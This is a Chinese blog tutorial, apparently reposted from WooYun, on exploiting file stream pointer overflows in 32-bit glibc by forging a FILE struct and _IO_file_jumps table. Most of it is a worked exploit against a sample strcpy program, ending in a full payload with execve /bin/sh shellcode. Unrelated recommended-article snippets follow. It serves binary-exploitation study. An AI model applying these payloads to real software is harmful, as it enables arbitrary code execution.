Head First FILE Stream Pointer Overflow

最新推荐文章于 2022-11-05 17:00:11 发布
最新推荐文章于 2022-11-05 17:00:11 发布
阅读量585 收藏
点赞数
分类专栏: 系统安全与漏洞分析 文章标签: buffer overflow

0x00 前言

哄完女票睡觉后,自己辗转反侧许久还是睡不着,干脆爬起来写一下文件流指针(我这里简称 FSP)溢出攻击的笔记。FSP 溢出和栈溢出同样古老,但是 paper 却很少,我翻遍 Google 只发现三四篇文章,都会附在最后的 Reference 里面,学习学习涨涨姿势。

本文先讲述 FSP 溢出攻击的原理,以及边构造边利用的方式攻击了一个示例程序。

另外,因为我接触 pwnable 时间不久,经验不足,基础不牢,如果有错误的地方或理解失误的地方还请指出。

0x01 介绍

许多种不安全的代码组合可以造成 FSP 溢出,比较明显的几种组合方式是: strcpy() ,strcat() ,read() , ....vfprintf(), fprintf(), fputc(), fputs() 的组合。

FSP 溢出攻击通常是用户输入数据覆盖了文件流指针,导致我们可控文件流指针指向的 FILE 结构体(FILE struct)。FILE 结构体具体定义可以看这里,在此不再赘述。

控制了文件流指针后,可以构造合法的 FILE 结构体,最终在系统跳转至 _IO_file_jumps 的时候跳转到我们控制的地址,以控制 eip。

这张图是 FILE 结构体的构成图。

p1

图片来源:https://outflux.net/blog/archives/2011/12/22/abusing-the-file-structure/

下面分析一下一个常见的 FILE 结构体构成。

1
2
3
4
5
6
7
8
9
10
11
gdb-peda$ x /40a stderr
0xf7fbb980: 0xfbad2086  0x0 0x0 0x0
0xf7fbb990: 0x0 0x0 0x0 0x0
0xf7fbb9a0: 0x0 0x0 0x0 0x0
0xf7fbb9b0: 0x0 0xf7fbba20  0x2 0x0
0xf7fbb9c0: 0xffffffff  0x0 0xf7fbc8ac  0xffffffff
0xf7fbb9d0: 0xffffffff  0x0 0xf7fbbb60  0x0
0xf7fbb9e0: 0x0 0x0 0x0 0x0
0xf7fbb9f0: 0x0 0x0 0x0 0x0
0xf7fbba00: 0x0 0x0 0x0 0x0
0xf7fbba10: 0x0 0xf7fbaa80 <_IO_file_jumps>  0x0 0x0

这是 stderr 的 FILE 结构体,_IO_file_jumps 的地址是 0xf7fbaa80

1
2
3
4
5
6
7
gdb-peda$ x /21a 0xf7fbaa80
0xf7fbaa80 <_IO_file_jumps>:    0x0 0x0 0xf7e86a70  0xf7e873e0
0xf7fbaa90 <_IO_file_jumps+16>: 0xf7e871b0  0xf7e884d0  0xf7e89360  0xf7e86670
0xf7fbaaa0 <_IO_file_jumps+32>: 0xf7e876c0  0xf7e85d00  0xf7e887a0  0xf7e863a0
0xf7fbaab0 <_IO_file_jumps+48>: 0xf7e862b0  0xf7e7a1e0  0xf7e87610  0xf7e85c00
0xf7fbaac0 <_IO_file_jumps+64>: 0xf7e87650  0xf7e85c90  0xf7e87690  0xf7e89500
0xf7fbaad0 <_IO_file_jumps+80>: 0xf7e89510

这就是 _IO_file_jumps 储存的要跳转到函数的地址了,比如:

1
2
gdb-peda$ x /i 0xf7e86670
    0xf7e86670 <_IO_file_xsputn>:    sub    esp,0x3c

这个地址就是函数 _IO_file_xsputn 的地址。

0x02 利用

大概聪明的你也应该想到利用方法了,我们能控制 FILE 指针的地址,那我们就可以自己构造一个假的 FILE struct,当然 _IO_file_jumps 也可以轻易的伪造。当各种文件处理函数跑到 _IO_file_jumps 寻找接下来该跳转的地址的时候,去我们伪造的 _IO_file_jumps 寻找指针,那么我们就可以控制 eip 执行 shellcode 了。

首先我们看一个示例程序(from: http://repo.hackerzvoice.net/depot_ouah/fsp-overflows.txt):

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
/*
  * file stream pointer overflow vulnerable program.c
  * -killah
  */
#include <stdio.h>
#include <string.h>
 
int main( int argc, char **argv)
{
    FILE *test;
    char msg[]= "no segfault yet\n" ;
    char stage[1024];
    if (argc<2) {
       printf ( "usage : %s <argument>\n" ,argv[0]);
       exit (-1);
    }
    test= fopen ( "temp" , "a" );
    strcpy (stage,argv[1]);
    fprintf (test, "%s" ,msg);
    exit (0);
}

可以看到先用了 strcpy,再用了 fprintf,很经典的组合方式。

编译:

1
cc -o fsp fsp.c -m32 -zexecstack -fno-stack-protector

大概由于优化的原因,我这里 fprintf 被优化成了 fputs,不过没差,一样可以利用。

利用的第一步先寻找到溢出的偏移。

当我用r $(python -c "print 'a'*1041 + 'AAAA'")跑的时候,可以控制 ESI。

p2

如图,ESI 已经被控制成 0x41414141,那么这里就是我们控制的文件指针了。我们把整个文件结构体放在栈上, AAAA 的前面 160 个字节。AAAA 也改成指向文件指针开头的地方。

1
2
3
4
5
6
gdb-peda$ searchmem AAAA
Searching for 'AAAA' in : None ranges
Found 3 results, display max 3 items:
[stack] : 0xffffd364 ( "AAAAR\345td]V\376\367\257\213" , <incomplete sequence \342>...)
[stack] : 0xffffd78c ( "AAAA" )
[stack] : 0xffffdd95 ( "AAAA" )

当前 AAAA 的地址为 0xffffd78c,减去 160 个字节后就是 0xffffd6ec。那么构造 payload:

1
r $(python -c "print 'a'*881 + 'B'*160 + '\xec\xd6\xff\xff'" )

p3

报了新的错?没关系,take it easy,现在就开始构造 FILE struct 了。

我们知道 stderr 是一个标准的 FILE 结构体,那我们直接拿它的,在它的基础上改成我们需要的就好了。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
gdb-peda$ x /160bx stderr
0xf7fbb980: 0x86    0x20    0xad    0xfb    0x00    0x00    0x00    0x00
0xf7fbb988: 0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0xf7fbb990: 0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0xf7fbb998: 0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0xf7fbb9a0: 0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0xf7fbb9a8: 0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0xf7fbb9b0: 0x00    0x00    0x00    0x00    0x20    0xba    0xfb    0xf7
0xf7fbb9b8: 0x02    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0xf7fbb9c0: 0xff    0xff    0xff    0xff    0x00    0x00    0x00    0x00
0xf7fbb9c8: 0xac    0xc8    0xfb    0xf7    0xff    0xff    0xff    0xff
0xf7fbb9d0: 0xff    0xff    0xff    0xff    0x00    0x00    0x00    0x00
0xf7fbb9d8: 0x60    0xbb    0xfb    0xf7    0x00    0x00    0x00    0x00
0xf7fbb9e0: 0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0xf7fbb9e8: 0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0xf7fbb9f0: 0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0xf7fbb9f8: 0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0xf7fbba00: 0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0xf7fbba08: 0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0xf7fbba10: 0x00    0x00    0x00    0x00    0x80    0xaa    0xfb    0xf7
0xf7fbba18: 0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00

经过处理后的到这么一长串:

1
\x86\x20\xad\xfb\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\xba\xfb\xf7\x02\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00\xac\xc8\xfb\xf7\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x00\x60\xbb\xfb\xf7\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80\xaa\xfb\xf7\x00\x00\x00\x00\x00\x00\x00\x00

但是我们知道,由于 strcpy 的缘故,并不能容忍 \x00 的存在,我们直接替换成 A 就好了,因为没报错..XD

1
r "`python -c " print 'a' *881 + '\x86\x20\xad\xfbAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x20\xba\xfb\xf7\x02AAAAAAA\xff\xff\xff\xffAAAA\xac\xc8\xfb\xf7\xff\xff\xff\xff\xff\xff\xff\xffAAAA\x60\xbb\xfb\xf7AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x80\xaa\xfb\xf7AAAAAAAA' + '\xec\xd6\xff\xff' "`"

拿去跑一下,看看有什么问题没有。

p4

快看快看,我们到了最后 call 的地方了。

也就是说,程序运行到要从 _IO_file_jumps 取出指针,然后跳转了。但是遇到了一些小问题, eax 不符合预期。看一下上下文的汇编代码。

1
2
3
4
5
6
7
0xf7e7b239 <fputs+153>: movzx  edx,BYTE PTR [esi+0x46]
0xf7e7b23d <fputs+157>: movsx  edx,dl
0xf7e7b240 <fputs+160>: mov    eax,DWORD PTR [esi+edx*1+0x94]
0xf7e7b247 <fputs+167>: mov    DWORD PTR [esp+0x8],edi
0xf7e7b24b <fputs+171>: mov    DWORD PTR [esp+0x4],ebp
0xf7e7b24f <fputs+175>: mov    DWORD PTR [esp],esi
0xf7e7b252 <fputs+178>: call   DWORD PTR [eax+0x1c]

edx 是从 esi+0x46 处得来的一个字节的值,eax 是 esi+edx+0x94 处的值,最后 call eax+0x1c。

大体先看一下 esi+0x94 的样子:

1
2
3
4
gdb-peda$ x /10w $esi+0x94
0xffffd780: 0xf7fbaa80  0x41414141  0x41414141  0xffffd6ec
0xffffd790: 0x08048500  0x00000000  0x00000000  0xf7e2f4d3
0xffffd7a0: 0x00000002  0xffffd834

0xffffd6ec 是我们控制的 FILE 结构体的地址,剩下的两处 0x41414141 正好可以用来写一些值来控制 eax。当 edx 为 0x4~0x8 的时候,正好在这 8 个字节的 0x41 的范围内。

我们让 esi+0x46 处为 8,然后第二处 0x41414141 指向 FILE 结构体前面的一块内存。

1
r "`python -c " print 'a' *881 + '\x86\x20\xad\xfbAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x20\xba\xfb\xf7\x02AAAAAAA\xff\xff\xff\xffAA\x08A\xac\xc8\xfb\xf7\xff\xff\xff\xff\xff\xff\xff\xffAAAA\x60\xbb\xfb\xf7AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x80\xaa\xfb\xf7AAAA\xae\xd6\xff\xff' + '\xec\xd6\xff\xff' "`"

我这里指向了 0xffffd63e 处,加上 0x1c 后(看上面汇编),为 0xffffd6ca。

p5

已经可以控制 eip 了,我们修改一下 0xffffd6ca 处的地址,使其指向 0xffffd6cf,然后 0xffffd6ce-0xffffd6ec 这 30 个字节上放上 shellcode。注意 shellcode 应该正好为 30 个字节,不能多也不能少,少了的话用 \x90 补充(根据实际情况来就好了)。

最终 payload:

1
r "`python -c " print 'a' *847 + '\xcf\xd6\xff\xff' + '\x90' *9 + '\x31\xc9\xf7\xe1\xb0\x0b\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80' + '\x86\x20\xad\xfbAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x20\xba\xfb\xf7\x02AAAAAAA\xff\xff\xff\xffAA\x08A\xac\xc8\xfb\xf7\xff\xff\xff\xff\xff\xff\xff\xffAAAA\x60\xbb\xfb\xf7AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x80\xaa\xfb\xf7AAAA\xae\xd6\xff\xff' + '\xec\xd6\xff\xff' "`"

执行效果: p6

0x03 参考

原文地址:http://drops.wooyun.org/binary/12740

Omni-Space
关注
专栏目录
【0240】源码分析PG内核中的关键字列表(SQL keywords)
专注【PostgreSQL源码学习&研究】
11-28 404
相关文章: 【0236】聊一聊PG内核中的命令标签(Command Tags、CommandTag、tag_behavior) 【0239】从编译原理角度理解 #include “xxx“ 或 #include<xxx> 的实现机制 1. PostgreSQL的SQL关键字列表(SQL Keywords) 1.1 keywords.c源文件内容 keywords.c源文件中的内容如下:      #include “c.h”      #include “common/keywords.h”      
【Unity3D应用案例系列】Unity3D中实现文字转语音的工具开发
CSDN博客专家,Unity3D高级软件工程师,《Unity 3D从入门到实战》作者。
08-04 2100
大家好,我是佛系工程师☆恬静的小魔龙☆,不定时更新Unity开发技巧,觉得有用记得一键三连哦。在开发中,会遇到将文字转语音输出的需求,一般是通过在网上找免费的工具去实现。常用的免费工具比如说:这些有些差强人意,配音的质量有点问题,而且还容易崩溃,就想着用Unity去实现一个文字转语音的工具。本篇文章,使用去实现文字转语音的功能,会从,一步一步实现,最后也会将工程上传,欢迎大家批评指正。先看一下效果图:(1)打开讯飞开发平台https://www.xfyun.cn/,登录注册一下: (2)注册完进入控制台h
头指针
Kelly成长之路
10-28 1568
头指针是什么?         头指针是以确定线性表中第一个元素对应的存储位置,一般用于处理数组、链表、队列等数据结构。单链表可以用头指针的名字来命名。单链表中头指针指向第一个结点。 什么时候存在?          链式存储时只要不是循环链表,就一定存在头指针。 头指针VS头结点:          由定义可知头指针指向链表第一个存储位置,当存在头结点时头指针指向头结点,这时如果删
house of kiwi利用
m0_63437215的博客
11-05 692
house of kiwi (dest0g3 520招新赛)
pwn题堆利用的一些姿势 -- IO_FILE
lifanxin的博客
05-11 5388
IO_FILE概述IO_FILE结构介绍利用IO_FILE进行leakFSOP总结 概述   这是pwn题堆利用系列的第三篇文章,本篇文章主要讲解一下IO_FILE结构在pwn题中的利用。一般来说,想到使用IO_FILE结构,是因为pwn题中没有可以用来leak的函数。 IO_FILE结构介绍   FILE 在 Linux 系统的标准 IO 库中是用于描述文件的结构,称为文件流。 FILE 结构在程序执行 fopen 等函数时会进行创建,并分配在堆中,然后以链表的形式串联起来,但系统一开始创建的三个文件st
浅析IOFILE结构及利用
Peanuts
11-21 3343
浅析IOFILE结构及利用 本文首发于先知社区 在hctf中遇到了这么一个题,也借这个题专门去补了补自己在IOFILE这一块知识点的知识。 libio.h中的结构 struct _IO_FILE { int _flags; /* High-order word is _IO_MAGIC; rest is flags. */ #define _IO_file_flags _...
IO_vtable和IO_FILE结构
snowleopard_bin的博客
04-05 843
void attribute_hidden _IO_vtable_check (void) { #ifdef SHARED /* Honor the compatibility flag. */ void (*flag) (void) = atomic_load_relaxed (&IO_accept_foreign_vtables); #ifdef PTR_DEMANGLE ...
IO_FILE——FSOP、house of orange
「 虚幻私塾」
01-20 362
Python微信订餐小程序课程视频 https://edu.csdn.net/course/detail/36074 Python实战量化交易理财系统 https://edu.csdn.net/course/detail/35475 FSOP 是 File Stream Oriented  Programming 的缩写。所有的 _IO_FILE 结构会由 _chain 字段连接形成一个链表,由 _IO_list_all 来维护。而 FSOP 的核心思想就是劫持通过 _IO_list_all 的值
使用VC++2010扩展python
crazyleen专栏
10-09 6240
使用VC++2010扩展python 简介:这里介绍使用VC2010编译C语言编写的python扩展模块,hdlc模块。Hdlc是高级数据链路控制(High-LevelData Link Control或简称HDLC),用于无界流数据上确保用户数据包的完整性。该模块接口应该是用hdlc_pkt = hdlc.pack(buf)把无界流数据buf打包成一个hdlc数据包hdlc_pkt
63-ALTERNATIVE IO MODELS
gaoxiangnumber1——Gao Xiang's Blog
09-21 2490
Please indicate the source: http://blog.csdn.net/gaoxiangnumber1Welcome to my github: https://github.com/gaoxiangnumber163.1 Overview Traditional blocking I/O model: A process performs I/O on one file
深入理解计算机系统实验日志(二)——Bomblab
Niya0515的博客
10-27 1106
因为在云主机上配置好了gdb调试器,本实验在ucloud上运行。 准备工作: 先将bomb可执行二进制文件上传至服务器 进行反汇编:objdump -d bomb_5 > my_bomb_assembly.S 再下载到本地分析汇编代码(注意不论是上传文件还是下载文件都是在本地终端,要退出云主机!!!这里犯了傻,一直报路径错误却怎么也发现不了问题所在)scp csapp07@106.75.241.219:/home/csapp07/myfile/my_bomb_assembly.S /Users/zh
【PWN】IO_FILE的利用
u014377094的博客
05-05 1355
IO_FILE 的结构 struct _IO_FILE { int _flags; /* High-order word is _IO_MAGIC; rest is flags. */ #define _IO_file_flags _flags /* The following pointers correspond to the C++ streambuf protocol. */ /* Note: Tk uses the _IO_read_ptr and _IO_read
GDB分析内核panic案例
bin_linux96的专栏
03-28 5724
这里记录平时使用gdb调试内核KE的步骤和方法. 有不足的地方也请大家指出和完善.1 必备工具和文件Gdb,addr2line,vmlinux以及内核coredump文件在64位平台,gdb和addr2line 分别使用aarch64-linux-android-gdbaarch64-linux-android-addr2line.2. 调试过程MTK平台coredump文件名为: SYS_M...
Linux系统应用经验总结
lotus302的专栏
01-23 5040
1.  日志类 1.1.  正常消息流程跟踪 MO消息匹配流程 3种消息类型:MO、MOSR、MO状态报告 2个匹配过程:          1)3与5,匹配点在网关,3发送的fwd包中Msg_id字段表示匹配ID,5接收的fwd包中msg_content字段中带有Msg_id字段,用于匹配,格式请参考点对点互通协议。          2)2与7,匹配点在SMSC,5流程中的MO
04-MOOC-链表
qq_43765310_taotaojia的博客
08-08 312
关键词:链表,增删改查操作。 head pointer 插入删除会影响头指针 | ??? [ ] -> [ ] -> [ ] head node 常用方法,即头指针为空 [x] -> [ ] -> [ ] C实现 初始化 struct Node { int data; struct Node* next; }; //typedef struct Node* LList; 取别名 void init(struct Node** phead ) { *...
英语方面的缩略语
denghuaken9487的博客
10-02 9311
A...AA Auto AnswerAAB All-to-All BroadcastAAL Asynchronous Transfer Mode Adaption LayerAAP Applications Access Point [DEC]AARP AppleTalk Address Resolution ProtocolAAS All-to-All Scatte...
ffplay 参数详解(基于版本4.0.1)
智眸之音
07-31 7952
Simple media player usage: ffplay [options] input_file Main options: -L                  show license -h topic            show help -? topic            show help -help topic         show help --help ...
c语言链表 关于指针参数调用问题
Developer_Zhang的专栏
06-10 2430
转自百度知道: 提问: typedef int elemtype; typedef struct node { elemtype data ; struct node * next; } snode,*linklist; 谭浩强的那本书上 这么写的: 关于建立空表 void set_linklist(linklist *head_pointer) { *head_po
【SCI2区】基于天鹰优化算法AO优化TCN锂电池健康寿命预测算法研究Matlab实现.rar
最新发布
11-12
1.版本:matlab2014/2019a/2024a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。 替换数据可以直接使用,注释清楚,适合新手
CPPC++_在许多编程语言中开始编写gilderose重构卡塔的代码.zip
11-12
cppc++
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值